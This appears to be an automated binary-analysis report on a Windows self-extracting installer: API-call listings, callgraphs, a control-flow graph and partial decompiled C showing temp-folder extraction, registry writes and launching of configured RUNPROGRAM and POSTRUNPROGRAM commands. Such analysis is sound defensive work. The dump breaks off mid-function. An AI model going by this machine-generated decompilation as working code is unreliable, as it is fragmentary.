2847 1096ce0 4 API calls 2843->2847 2846 1095495 2846->2843 2850 109550c 2846->2850 2851 10954c2 GetSystemInfo 2846->2851 2852 109559a 2847->2852 2848 109553b CreateDirectoryA 2853 1095577 2848->2853 2854 1095547 2848->2854 2849 109554d 2849->2843 2858 109597d 34 API calls 2849->2858 2855 109658a CharPrevA 2850->2855 2857 10954da 2851->2857 2852->2714 2864 1092630 GetWindowsDirectoryA 2852->2864 2856 1096285 GetLastError 2853->2856 2854->2849 2855->2859 2860 109557c 2856->2860 2857->2850 2862 109658a CharPrevA 2857->2862 2861 109555c 2858->2861 2912 10958c8 2859->2912 2860->2843 2861->2843 2863 1095568 RemoveDirectoryA 2861->2863 2862->2850 2863->2843 2865 109266f 2864->2865 2866 109265e 2864->2866 2868 1096ce0 4 API calls 2865->2868 2867 10944b9 20 API calls 2866->2867 2867->2865 2869 1092687 2868->2869 2869->2700 2869->2715 2871 109696e GetDiskFreeSpaceA 2870->2871 2872 10969a1 2870->2872 2871->2872 2873 1096989 MulDiv 2871->2873 2872->2724 2873->2872 2875 10959bb 2874->2875 2876 10959dd GetDiskFreeSpaceA 2874->2876 2877 10944b9 20 API calls 2875->2877 2878 1095ba1 memset 2876->2878 2879 1095a21 MulDiv 2876->2879 2880 10959cc 2877->2880 2881 1096285 GetLastError 2878->2881 2879->2878 2882 1095a50 GetVolumeInformationA 2879->2882 2883 1096285 GetLastError 2880->2883 2884 1095bbc GetLastError FormatMessageA 2881->2884 2885 1095a6e memset 2882->2885 2886 1095ab5 SetCurrentDirectoryA 2882->2886 2887 10959d1 2883->2887 2888 1095be3 2884->2888 2889 1096285 GetLastError 2885->2889 2895 1095acc 2886->2895 2899 1095b94 2887->2899 2890 10944b9 20 API calls 2888->2890 2891 1095a89 GetLastError FormatMessageA 2889->2891 2893 1095bf5 SetCurrentDirectoryA 2890->2893 2891->2888 2892 1096ce0 4 API calls 2894 1095c11 2892->2894 2893->2899 2894->2700 2896 1095b0a 2895->2896 2898 1095b20 2895->2898 2897 10944b9 20 API calls 2896->2897 2897->2887 2898->2899 2924 109268b 2898->2924 2899->2892 2903 10953bf 2901->2903 2902 109171e _vsnprintf 2902->2903 2903->2902 2904 109658a CharPrevA 2903->2904 2907 1095415 GetTempFileNameA 2903->2907 2905 10953fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 109544f CreateDirectoryA 2905->2906 2906->2907 2908 109543a 2906->2908 2907->2908 2909 1095429 DeleteFileA CreateDirectoryA 2907->2909 2910 1096ce0 4 API calls 2908->2910 2909->2908 2911 1095449 2910->2911 2911->2846 2913 10958d8 2912->2913 2913->2913 2914 10958df LocalAlloc 2913->2914 2915 10958f3 2914->2915 2917 1095919 2914->2917 2916 10944b9 20 API calls 2915->2916 2918 1095906 2916->2918 2919 109658a CharPrevA 2917->2919 2920 1096285 GetLastError 2918->2920 2922 1095534 2918->2922 2921 1095931 CreateFileA LocalFree 2919->2921 2920->2922 2921->2918 2923 109595b CloseHandle GetFileAttributesA 2921->2923 2922->2848 2922->2849 2923->2918 2925 10926b9 2924->2925 2926 10926e5 2924->2926 2929 109171e _vsnprintf 2925->2929 2927 10926ea 2926->2927 2928 109271f 2926->2928 2930 109171e _vsnprintf 2927->2930 2931 10926e3 2928->2931 2936 109171e _vsnprintf 2928->2936 2932 10926cc 2929->2932 2935 10926fd 2930->2935 2933 1096ce0 4 API calls 2931->2933 2934 10944b9 20 API calls 2932->2934 2937 109276d 2933->2937 2934->2931 2938 10944b9 20 API calls 2935->2938 2939 1092735 2936->2939 2937->2899 2938->2931 2940 10944b9 20 API calls 2939->2940 2940->2931 2942 109468f 7 API calls 2941->2942 2943 1094ff5 FindResourceA LoadResource LockResource 2942->2943 2944 1095020 2943->2944 2959 109515f 2943->2959 2945 1095029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2944->2945 2946 1095057 2944->2946 2945->2946 2963 1094efd 2946->2963 2949 109507c 2953 10950e8 2949->2953 2957 1095106 2949->2957 2950 1095060 2951 10944b9 20 API calls 2950->2951 2952 1095075 2951->2952 2952->2957 2955 10944b9 20 API calls 2953->2955 2954 1095110 FreeResource 2956 109511d 2954->2956 2955->2952 2958 1095129 2956->2958 2960 109513a 2956->2960 2957->2954 2957->2956 2961 10944b9 20 API calls 2958->2961 2959->2743 2960->2959 2962 109514c SendMessageA 2960->2962 2961->2960 2962->2959 2964 1094f4a 2963->2964 2965 1094980 25 API calls 2964->2965 2970 1094fa1 2964->2970 2968 1094f67 2965->2968 2966 1096ce0 4 API calls 2967 1094fc6 2966->2967 2967->2949 2967->2950 2969 1094b60 FindCloseChangeNotification 2968->2969 2968->2970 2969->2970 2970->2966 2972 109255b 2971->2972 2973 1092510 2971->2973 2974 1096ce0 4 API calls 2972->2974 2975 109658a CharPrevA 2973->2975 2976 1092569 2974->2976 2977 1092522 WritePrivateProfileStringA _lopen 2975->2977 2976->2753 2977->2972 2978 1092548 _llseek _lclose 2977->2978 2978->2972 2980 1091b25 2979->2980 3083 1091a84 2980->3083 2982 1091b57 2983 109658a CharPrevA 2982->2983 2984 1091b8c 2982->2984 2983->2984 2985 10966c8 2 API calls 2984->2985 2986 1091bd1 2985->2986 2987 1091bd9 CompareStringA 2986->2987 2988 1091d73 2986->2988 2987->2988 2989 1091bf7 GetFileAttributesA 2987->2989 2990 10966c8 2 API calls 2988->2990 2992 1091c0d 2989->2992 2993 1091d53 2989->2993 2991 1091d7d 2990->2991 2994 1091df8 LocalAlloc 2991->2994 2995 1091d81 CompareStringA 2991->2995 2992->2993 2996 1091a84 2 API calls 2992->2996 2999 10944b9 20 API calls 2993->2999 2994->2993 2998 1091e0b GetFileAttributesA 2994->2998 2995->2994 2997 1091d9b LocalAlloc 2995->2997 3001 1091c31 2996->3001 2997->2993 3010 1091de1 2997->3010 3004 1091e1d 2998->3004 3016 1091e45 2998->3016 3017 1091cc2 2999->3017 3000 1091c50 LocalAlloc 3000->2993 3002 1091c67 GetPrivateProfileIntA GetPrivateProfileStringA 3000->3002 3001->3000 3005 1091a84 2 API calls 3001->3005 3011 1091cf8 3002->3011 3002->3017 3003 1096ce0 4 API calls 3009 1091ea1 3003->3009 3004->3016 3005->3000 3009->2766 3015 109171e _vsnprintf 3010->3015 3013 1091d09 GetShortPathNameA 3011->3013 3014 1091d23 3011->3014 3012 1091e89 3012->3003 3013->3014 3018 109171e _vsnprintf 3014->3018 3015->3017 3089 1092aac 3016->3089 3017->3012 3018->3017 3020 109209a 3019->3020 3021 1092256 3019->3021 3023 109171e _vsnprintf 3020->3023 3026 10920dc 3020->3026 3022 1096ce0 4 API calls 3021->3022 3024 1092263 3022->3024 3025 10920af RegQueryValueExA 3023->3025 3024->2766 3025->3020 3025->3026 3027 10920fb GetSystemDirectoryA 3026->3027 3028 10920e4 RegCloseKey 3026->3028 3029 109658a CharPrevA 3027->3029 3028->3021 3030 109211b LoadLibraryA 3029->3030 3031 1092179 GetModuleFileNameA 3030->3031 3032 109212e GetProcAddress FreeLibrary 3030->3032 3033 10921de RegCloseKey 3031->3033 3037 1092177 3031->3037 3032->3031 3034 109214e GetSystemDirectoryA 3032->3034 3033->3021 3035 1092165 3034->3035 3034->3037 3036 109658a CharPrevA 3035->3036 3036->3037 3037->3037 3038 10921b7 LocalAlloc 3037->3038 3039 10921cd 3038->3039 3040 10921ec 3038->3040 3041 10944b9 20 API calls 3039->3041 3042 109171e _vsnprintf 3040->3042 3041->3033 3043 1092218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3021 3046 1094016 CreateProcessA 3045->3046 3057 1094106 3045->3057 3047 1094041 WaitForSingleObject GetExitCodeProcess 3046->3047 3048 10940c4 3046->3048 3054 1094070 3047->3054 3051 1096285 GetLastError 3048->3051 3049 1096ce0 4 API calls 3050 1094117 3049->3050 3050->2766 3053 10940c9 GetLastError FormatMessageA 3051->3053 3056 10944b9 20 API calls 3053->3056 3116 109411b 3054->3116 3055 1094096 CloseHandle CloseHandle 3055->3057 3058 10940ba 3055->3058 3056->3057 3057->3049 3058->3057 3060 10964c2 3059->3060 3061 109658a CharPrevA 3060->3061 3062 10964d8 GetFileAttributesA 3061->3062 3063 10964ea 3062->3063 3064 1096501 LoadLibraryA 3062->3064 3063->3064 3065 10964ee LoadLibraryExA 3063->3065 3066 1096508 3064->3066 3065->3066 3067 1096ce0 4 API calls 3066->3067 3068 1096513 3067->3068 3068->2791 3070 1092289 RegOpenKeyExA 3069->3070 3071 1092381 3069->3071 3070->3071 3073 10922b1 RegQueryValueExA 3070->3073 3072 1096ce0 4 API calls 3071->3072 3074 109238c 3072->3074 3075 1092374 RegCloseKey 3073->3075 3076 10922e6 memset GetSystemDirectoryA 3073->3076 3074->2769 3075->3071 3077 109230f 3076->3077 3078 1092321 3076->3078 3079 109658a CharPrevA 3077->3079 3080 109171e _vsnprintf 3078->3080 3079->3078 3081 109233f 3080->3081 3081->3081 3082 1092353 RegSetValueExA 3081->3082 3082->3075 3084 1091a9a 3083->3084 3086 1091aba 3084->3086 3088 1091aaf 3084->3088 3102 109667f 3084->3102 3086->2982 3087 109667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 1092be6 3089->3090 3091 1092ad4 GetModuleFileNameA 3089->3091 3092 1096ce0 4 API calls 3090->3092 3099 1092b02 3091->3099 3094 1092bf5 3092->3094 3093 1092af1 IsDBCSLeadByte 3093->3099 3094->3012 3095 1092bca CharNextA 3097 1092bd3 CharNextA 3095->3097 3096 1092b11 CharNextA CharUpperA 3098 1092b8d CharUpperA 3096->3098 3096->3099 3097->3099 3098->3099 3099->3090 3099->3093 3099->3095 3099->3096 3099->3097 3101 1092b43 CharPrevA 3099->3101 3107 10965e8 3099->3107 3101->3099 3103 1096689 3102->3103 3104 10966a5 3103->3104 3105 1096648 IsDBCSLeadByte 3103->3105 3106 1096697 CharNextA 3103->3106 3104->3084 3105->3103 3106->3103 3108 10965f4 3107->3108 3108->3108 3109 10965fb CharPrevA 3108->3109 3110 1096611 CharPrevA 3109->3110 3111 109660b 3110->3111 3112 109661e 3110->3112 3111->3110 3111->3112 3113 1096634 CharNextA 3112->3113 3114 1096627 CharPrevA 3112->3114 3115 109663d 3112->3115 3113->3115 3114->3113 3114->3115 3115->3099 3117 1094132 3116->3117 3119 109412a 3116->3119 3120 1091ea7 3117->3120 3119->3055 3121 1091ed3 3120->3121 3122 1091eba 3120->3122 3121->3119 3123 109256d 15 API calls 3122->3123 3123->3121 3125 1091ff0 RegOpenKeyExA 3124->3125 3126 1092026 3124->3126 3125->3126 3127 109200f RegDeleteValueA RegCloseKey 3125->3127 3126->2479 3127->3126 3237 1096a20 __getmainargs 3238 10919e0 3239 1091a03 3238->3239 3240 1091a24 GetDesktopWindow 3238->3240 3241 1091a20 3239->3241 3243 1091a16 EndDialog 3239->3243 3242 10943d0 11 API calls 3240->3242 3245 1096ce0 4 API calls 3241->3245 3244 1091a33 LoadStringA SetDlgItemTextA MessageBeep 3242->3244 3243->3241 3244->3241 3246 1091a7e 3245->3246 3247 1097270 _except_handler4_common 3248 10969b0 3249 10969b5 3248->3249 3257 1096fbe GetModuleHandleW 3249->3257 3251 10969c1 __set_app_type __p__fmode __p__commode 3252 10969f9 3251->3252 3253 1096a0e 3252->3253 3254 1096a02 __setusermatherr 3252->3254 3259 10971ef _controlfp 3253->3259 3254->3253 3256 1096a13 3258 1096fcf 3257->3258 3258->3251 3259->3256 3260 10934f0 3261 1093504 3260->3261 3262 10935b8 3260->3262 3261->3262 3263 109351b 3261->3263 3264 10935be GetDesktopWindow 3261->3264 3265 1093526 3262->3265 3269 1093671 EndDialog 3262->3269 3267 109354f 3263->3267 3268 109351f 3263->3268 3266 10943d0 11 API calls 3264->3266 3270 10935d6 3266->3270 3267->3265 3272 1093559 ResetEvent 3267->3272 3268->3265 3271 109352d TerminateThread EndDialog 3268->3271 3269->3265 3273 109361d SetWindowTextA CreateThread 3270->3273 3274 10935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3270->3274 3271->3265 3275 10944b9 20 API calls 3272->3275 3273->3265 3276 1093646 3273->3276 3274->3273 3277 1093581 3275->3277 3278 10944b9 20 API calls 3276->3278 3279 109359b SetEvent 3277->3279 3281 109358a SetEvent 3277->3281 3278->3262 3280 1093680 4 API calls 3279->3280 3280->3262 3281->3265 3282 1096ef0 3283 1096f2d 3282->3283 3284 1096f02 3282->3284 3284->3283 3285 1096f27 ?terminate@ 3284->3285 3285->3283

                                                          Callgraph

                                                          • Executed
                                                          • Not Executed
                                                          • Opacity -> Relevance
                                                          • Disassembly available
                                                          callgraph 0 Function_01097208 1 Function_0109490C 2 Function_01097000 3 Function_01094200 4 Function_01093100 95 Function_010943D0 4->95 5 Function_01096C03 27 Function_0109724D 5->27 6 Function_01094702 56 Function_01091680 6->56 83 Function_010916B3 6->83 7 Function_0109411B 79 Function_01091EA7 7->79 8 Function_01092F1D 11 Function_0109621E 8->11 21 Function_01093B26 8->21 22 Function_01093A3F 8->22 34 Function_01094169 8->34 35 Function_0109256D 8->35 41 Function_01095164 8->41 52 Function_0109658A 8->52 59 Function_01096285 8->59 74 Function_010955A0 8->74 76 Function_01093BA2 8->76 80 Function_010944B9 8->80 108 Function_01096CE0 8->108 112 Function_010951E5 8->112 9 Function_0109681F 9->108 113 Function_010966F9 9->113 10 Function_0109171E 45 Function_0109597D 11->45 11->59 11->80 11->108 12 Function_01093210 20 Function_01094224 12->20 12->45 12->52 12->80 86 Function_010958C8 12->86 12->95 13 Function_01097010 14 Function_01095C17 15 Function_01096517 15->80 16 Function_01096E2A 117 Function_01096CF0 16->117 17 Function_0109202A 17->10 17->52 17->80 17->108 18 Function_01097120 19 Function_01096A20 20->56 20->80 21->15 62 Function_01096298 21->62 106 Function_01094FE0 21->106 22->15 53 Function_0109468F 22->53 22->59 22->80 23 Function_01096C3F 24 Function_01092630 24->80 24->108 25 Function_01094C37 26 Function_01096648 28 Function_01096F40 29 Function_01094A50 30 Function_01093450 30->95 31 Function_01096952 32 Function_01097155 33 Function_01096F54 33->0 33->27 34->53 34->80 107 Function_010924E0 35->107 36 Function_0109476D 36->15 70 Function_010966AE 36->70 37 Function_01094B60 38 Function_01096A60 38->0 38->23 38->27 38->32 39 Function_01097060 38->39 114 Function_01092BFB 38->114 39->13 39->18 40 Function_01096760 41->53 41->62 41->80 42 Function_01095467 42->45 42->52 54 Function_01091781 42->54 42->56 42->59 71 Function_010953A1 42->71 42->86 42->108 43 Function_01092267 43->10 43->52 43->108 44 Function_0109487A 44->1 51 Function_0109268B 45->51 45->59 45->80 45->108 46 Function_0109667F 46->26 47 Function_01097270 48 Function_01096C70 49 Function_01092773 49->52 49->54 49->56 49->108 50 Function_01092A89 51->10 51->80 51->108 52->83 55 Function_01094980 55->44 55->80 56->54 57 Function_01093680 58 Function_01096380 60 Function_01091A84 60->46 61 Function_01094E99 61->56 62->10 62->108 63 Function_01095C9E 63->14 63->16 63->46 63->52 63->56 63->80 87 Function_010966C8 63->87 63->108 109 Function_010931E0 63->109 64 Function_01092390 64->52 64->56 64->64 64->83 64->108 65 Function_01091F90 65->79 65->80 65->108 66 Function_01096793 67 Function_01096495 67->52 67->54 67->108 68 Function_01092CAA 68->15 68->53 68->63 68->64 75 Function_010918A3 68->75 68->80 103 Function_010936EE 68->103 68->108 69 Function_01092AAC 69->56 88 Function_010917C8 69->88 98 Function_010965E8 69->98 69->108 71->10 71->52 71->56 71->108 72 Function_01096FA1 73 Function_01094CA0 74->15 74->24 74->31 74->42 74->45 74->52 74->53 74->54 74->59 74->80 74->108 104 Function_010917EE 75->104 75->108 76->17 76->43 76->53 76->54 76->59 76->67 76->80 96 Function_01091AE8 76->96 100 Function_01093FEF 76->100 76->108 77 Function_010972A2 78 Function_01096FA5 78->27 79->35 80->9 80->10 80->56 85 Function_010967C9 80->85 80->108 81 Function_01096FBE 81->33 82 Function_010969B0 82->2 82->48 82->81 101 Function_010971EF 82->101 83->54 84 Function_010952B6 84->54 84->64 84->98 105 Function_01091FE1 84->105 84->108 85->66 86->52 86->56 86->59 86->80 87->26 89 Function_01094CC0 90 Function_01094BC0 91 Function_010930C0 92 Function_010963C0 92->52 92->54 92->108 93 Function_01094AD0 93->57 94 Function_01094CD0 94->6 94->25 94->36 94->37 94->55 94->61 94->108 110 Function_010947E0 94->110 95->108 96->10 96->52 96->54 96->56 96->60 96->69 96->80 96->83 96->87 96->108 97 Function_010928E8 97->49 97->50 99 Function_010970EB 100->7 100->59 100->80 100->108 102 Function_01096BEF 103->9 103->50 103->80 103->85 103->97 103->108 104->108 106->53 106->80 115 Function_01094EFD 106->115 107->52 107->108 108->117 110->56 110->80 111 Function_010919E0 111->95 111->108 112->53 112->59 112->80 114->8 114->65 114->68 114->84 115->37 115->55 115->108 116 Function_010970FE 118 Function_010934F0 118->57 118->80 118->95 119 Function_01096EF0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 36 1093ba2-1093bd9 37 1093bdb-1093bee call 109468f 36->37 38 1093bfd-1093bff 36->38 44 1093d13-1093d30 call 10944b9 37->44 45 1093bf4-1093bf7 37->45 40 1093c03-1093c28 memset 38->40 42 1093c2e-1093c40 call 109468f 40->42 43 1093d35-1093d48 call 1091781 40->43 42->44 54 1093c46-1093c49 42->54 49 1093d4d-1093d52 43->49 55 1093f4d 44->55 45->38 45->44 52 1093d9e-1093db6 call 1091ae8 49->52 53 1093d54-1093d6c call 109468f 49->53 52->55 64 1093dbc-1093dc2 52->64 53->44 66 1093d6e-1093d75 53->66 54->44 57 1093c4f-1093c56 54->57 59 1093f4f-1093f63 call 1096ce0 55->59 61 1093c58-1093c5e 57->61 62 1093c60-1093c65 57->62 67 1093c6e-1093c73 61->67 68 1093c75-1093c7c 62->68 69 1093c67-1093c6d 62->69 70 1093dc4-1093dce 64->70 71 1093de6-1093de8 64->71 75 1093d7b-1093d98 CompareStringA 66->75 76 1093fda-1093fe1 66->76 72 1093c87-1093c89 67->72 68->72 73 1093c7e-1093c82 68->73 69->67 70->71 77 1093dd0-1093dd7 70->77 79 1093f0b-1093f15 call 1093fef 71->79 80 1093dee-1093df5 71->80 72->49 78 1093c8f-1093c98 72->78 73->72 75->52 75->76 81 1093fe8-1093fea 76->81 82 1093fe3 call 1092267 76->82 77->71 84 1093dd9-1093ddb 77->84 85 1093c9a-1093c9c 78->85 86 1093cf1-1093cf3 78->86 90 1093f1a-1093f1c 79->90 87 1093fab-1093fd2 call 10944b9 LocalFree 80->87 88 1093dfb-1093dfd 80->88 81->59 82->81 84->80 91 1093ddd-1093de1 call 109202a 84->91 93 1093c9e-1093ca3 85->93 94 1093ca5-1093ca7 85->94 86->52 96 1093cf9-1093d11 call 109468f 86->96 87->55 88->79 95 1093e03-1093e0a 88->95 98 1093f1e-1093f2d LocalFree 90->98 99 1093f46-1093f47 LocalFree 90->99 91->71 102 1093cb2-1093cc5 call 109468f 93->102 94->55 103 1093cad 94->103 95->79 104 1093e10-1093e19 call 1096495 95->104 96->44 96->49 106 1093f33-1093f3b 98->106 107 1093fd7-1093fd9 98->107 99->55 102->44 112 1093cc7-1093ce8 CompareStringA 102->112 103->102 113 1093e1f-1093e36 GetProcAddress 104->113 114 1093f92-1093fa9 call 10944b9 104->114 106->40 107->76 112->86 116 1093cea-1093ced 112->116 117 1093e3c-1093e80 113->117 118 1093f64-1093f76 call 10944b9 FreeLibrary 113->118 125 1093f7c-1093f90 LocalFree call 1096285 114->125 116->86 121 1093e8b-1093e94 117->121 122 1093e82-1093e87 117->122 118->125 123 1093e9f-1093ea2 121->123 124 1093e96-1093e9b 121->124 122->121 127 1093ead-1093eb6 123->127 128 1093ea4-1093ea9 123->128 124->123 125->55 131 1093eb8-1093ebd 127->131 132 1093ec1-1093ec3 127->132 128->127 131->132 133 1093ece-1093eec 132->133 134 1093ec5-1093eca 132->134 137 1093eee-1093ef3 133->137 138 1093ef5-1093efd 133->138 134->133 137->138 139 1093eff-1093f09 FreeLibrary 138->139 140 1093f40 FreeLibrary 138->140 139->98 140->99
                                                          C-Code - Quality: 82%
                                                          			E01093BA2() {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				char _v276;
                                                          				char _v280;
                                                          				short _v300;
                                                          				intOrPtr _v304;
                                                          				void _v348;
                                                          				char _v352;
                                                          				intOrPtr _v356;
                                                          				signed int _v360;
                                                          				short _v364;
                                                          				char* _v368;
                                                          				intOrPtr _v372;
                                                          				void* _v376;
                                                          				intOrPtr _v380;
                                                          				char _v384;
                                                          				signed int _v388;
                                                          				intOrPtr _v392;
                                                          				signed int _v396;
                                                          				signed int _v400;
                                                          				signed int _v404;
                                                          				void* _v408;
                                                          				void* _v424;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t69;
                                                          				signed int _t76;
                                                          				void* _t77;
                                                          				signed int _t79;
                                                          				short _t96;
                                                          				signed int _t97;
                                                          				intOrPtr _t98;
                                                          				signed int _t101;
                                                          				signed int _t104;
                                                          				signed int _t108;
                                                          				int _t112;
                                                          				void* _t115;
                                                          				signed char _t118;
                                                          				void* _t125;
                                                          				signed int _t127;
                                                          				void* _t128;
                                                          				struct HINSTANCE__* _t129;
                                                          				void* _t130;
                                                          				short _t137;
                                                          				char* _t140;
                                                          				signed char _t144;
                                                          				signed char _t145;
                                                          				signed int _t149;
                                                          				void* _t150;
                                                          				void* _t151;
                                                          				signed int _t153;
                                                          				void* _t155;
                                                          				void* _t156;
                                                          				signed int _t157;
                                                          				signed int _t162;
                                                          				signed int _t164;
                                                          				void* _t165;
                                                          
                                                          				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                          				_t69 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t69 ^ _t164;
                                                          				_t153 = 0;
                                                          				 *0x1099124 =  *0x1099124 & 0;
                                                          				_t149 = 0;
                                                          				_v388 = 0;
                                                          				_v384 = 0;
                                                          				_t165 =  *0x1098a28 - _t153; // 0x0
                                                          				if(_t165 != 0) {
                                                          					L3:
                                                          					_t127 = 0;
                                                          					_v392 = 0;
                                                          					while(1) {
                                                          						_v400 = _v400 & 0x00000000;
                                                          						memset( &_v348, 0, 0x44);
                                                          						_t164 = _t164 + 0xc;
                                                          						_v348 = 0x44;
                                                          						if( *0x1098c42 != 0) {
                                                          							goto L26;
                                                          						}
                                                          						_t146 =  &_v396;
                                                          						_t115 = E0109468F("SHOWWINDOW",  &_v396, 4);
                                                          						if(_t115 == 0 || _t115 > 4) {
                                                          							L25:
                                                          							_t146 = 0x4b1;
                                                          							E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          							 *0x1099124 = 0x80070714;
                                                          							goto L62;
                                                          						} else {
                                                          							if(_v396 != 1) {
                                                          								__eflags = _v396 - 2;
                                                          								if(_v396 != 2) {
                                                          									_t137 = 3;
                                                          									__eflags = _v396 - _t137;
                                                          									if(_v396 == _t137) {
                                                          										_v304 = 1;
                                                          										_v300 = _t137;
                                                          									}
                                                          									goto L14;
                                                          								}
                                                          								_push(6);
                                                          								_v304 = 1;
                                                          								_pop(0);
                                                          								goto L11;
                                                          							} else {
                                                          								_v304 = 1;
                                                          								L11:
                                                          								_v300 = 0;
                                                          								L14:
                                                          								if(_t127 != 0) {
                                                          									L27:
                                                          									_t155 = 1;
                                                          									__eflags = _t127 - 1;
                                                          									if(_t127 != 1) {
                                                          										L31:
                                                          										_t132 =  &_v280;
                                                          										_t76 = E01091AE8( &_v280,  &_v408,  &_v404); // executed
                                                          										__eflags = _t76;
                                                          										if(_t76 == 0) {
                                                          											L62:
                                                          											_t77 = 0;
                                                          											L63:
                                                          											_pop(_t150);
                                                          											_pop(_t156);
                                                          											_pop(_t128);
                                                          											return E01096CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                          										}
                                                          										_t157 = _v404;
                                                          										__eflags = _t149;
                                                          										if(_t149 != 0) {
                                                          											L37:
                                                          											__eflags = _t157;
                                                          											if(_t157 == 0) {
                                                          												L57:
                                                          												_t151 = _v408;
                                                          												_t146 =  &_v352;
                                                          												_t130 = _t151; // executed
                                                          												_t79 = E01093FEF(_t130,  &_v352); // executed
                                                          												__eflags = _t79;
                                                          												if(_t79 == 0) {
                                                          													L61:
                                                          													LocalFree(_t151);
                                                          													goto L62;
                                                          												}
                                                          												L58:
                                                          												LocalFree(_t151);
                                                          												_t127 = _t127 + 1;
                                                          												_v396 = _t127;
                                                          												__eflags = _t127 - 2;
                                                          												if(_t127 >= 2) {
                                                          													_t155 = 1;
                                                          													__eflags = 1;
                                                          													L69:
                                                          													__eflags =  *0x1098580;
                                                          													if( *0x1098580 != 0) {
                                                          														E01092267();
                                                          													}
                                                          													_t77 = _t155;
                                                          													goto L63;
                                                          												}
                                                          												_t153 = _v392;
                                                          												_t149 = _v388;
                                                          												continue;
                                                          											}
                                                          											L38:
                                                          											__eflags =  *0x1098180;
                                                          											if( *0x1098180 == 0) {
                                                          												_t146 = 0x4c7;
                                                          												E010944B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                          												LocalFree(_v424);
                                                          												 *0x1099124 = 0x8007042b;
                                                          												goto L62;
                                                          											}
                                                          											__eflags = _t157;
                                                          											if(_t157 == 0) {
                                                          												goto L57;
                                                          											}
                                                          											__eflags =  *0x1099a34 & 0x00000004;
                                                          											if(__eflags == 0) {
                                                          												goto L57;
                                                          											}
                                                          											_t129 = E01096495(_t127, _t132, _t157, __eflags);
                                                          											__eflags = _t129;
                                                          											if(_t129 == 0) {
                                                          												_t146 = 0x4c8;
                                                          												E010944B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                          												L65:
                                                          												LocalFree(_v408);
                                                          												 *0x1099124 = E01096285();
                                                          												goto L62;
                                                          											}
                                                          											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                          											_v404 = _t146;
                                                          											__eflags = _t146;
                                                          											if(_t146 == 0) {
                                                          												_t146 = 0x4c9;
                                                          												__eflags = 0;
                                                          												E010944B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                          												FreeLibrary(_t129);
                                                          												goto L65;
                                                          											}
                                                          											__eflags =  *0x1098a30;
                                                          											_t151 = _v408;
                                                          											_v384 = 0;
                                                          											_v368 =  &_v280;
                                                          											_t96 =  *0x1099a40; // 0x3
                                                          											_v364 = _t96;
                                                          											_t97 =  *0x1098a38 & 0x0000ffff;
                                                          											_v380 = 0x1099154;
                                                          											_v376 = _t151;
                                                          											_v372 = 0x10991e4;
                                                          											_v360 = _t97;
                                                          											if( *0x1098a30 != 0) {
                                                          												_t97 = _t97 | 0x00010000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											_t144 =  *0x1099a34; // 0x1
                                                          											__eflags = _t144 & 0x00000008;
                                                          											if((_t144 & 0x00000008) != 0) {
                                                          												_t97 = _t97 | 0x00020000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											__eflags = _t144 & 0x00000010;
                                                          											if((_t144 & 0x00000010) != 0) {
                                                          												_t97 = _t97 | 0x00040000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											_t145 =  *0x1098d48; // 0x0
                                                          											__eflags = _t145 & 0x00000040;
                                                          											if((_t145 & 0x00000040) != 0) {
                                                          												_t97 = _t97 | 0x00080000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											__eflags = _t145;
                                                          											if(_t145 < 0) {
                                                          												_t104 = _t97 | 0x00100000;
                                                          												__eflags = _t104;
                                                          												_v360 = _t104;
                                                          											}
                                                          											_t98 =  *0x1099a38; // 0x0
                                                          											_v356 = _t98;
                                                          											_t130 = _t146;
                                                          											 *0x109a288( &_v384);
                                                          											_t101 = _v404();
                                                          											__eflags = _t164 - _t164;
                                                          											if(_t164 != _t164) {
                                                          												_t130 = 4;
                                                          												asm("int 0x29");
                                                          											}
                                                          											 *0x1099124 = _t101;
                                                          											_push(_t129);
                                                          											__eflags = _t101;
                                                          											if(_t101 < 0) {
                                                          												FreeLibrary();
                                                          												goto L61;
                                                          											} else {
                                                          												FreeLibrary();
                                                          												_t127 = _v400;
                                                          												goto L58;
                                                          											}
                                                          										}
                                                          										__eflags =  *0x1099a40 - 1; // 0x3
                                                          										if(__eflags == 0) {
                                                          											goto L37;
                                                          										}
                                                          										__eflags =  *0x1098a20;
                                                          										if( *0x1098a20 == 0) {
                                                          											goto L37;
                                                          										}
                                                          										__eflags = _t157;
                                                          										if(_t157 != 0) {
                                                          											goto L38;
                                                          										}
                                                          										_v388 = 1;
                                                          										E0109202A(_t146); // executed
                                                          										goto L37;
                                                          									}
                                                          									_t146 =  &_v280;
                                                          									_t108 = E0109468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                          									__eflags = _t108;
                                                          									if(_t108 == 0) {
                                                          										goto L25;
                                                          									}
                                                          									__eflags =  *0x1098c42;
                                                          									if( *0x1098c42 != 0) {
                                                          										goto L69;
                                                          									}
                                                          									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                          									__eflags = _t112 == 0;
                                                          									if(_t112 == 0) {
                                                          										goto L69;
                                                          									}
                                                          									goto L31;
                                                          								}
                                                          								_t118 =  *0x1098a38; // 0x0
                                                          								if(_t118 == 0) {
                                                          									L23:
                                                          									if(_t153 != 0) {
                                                          										goto L31;
                                                          									}
                                                          									_t146 =  &_v276;
                                                          									if(E0109468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                          										goto L27;
                                                          									}
                                                          									goto L25;
                                                          								}
                                                          								if((_t118 & 0x00000001) == 0) {
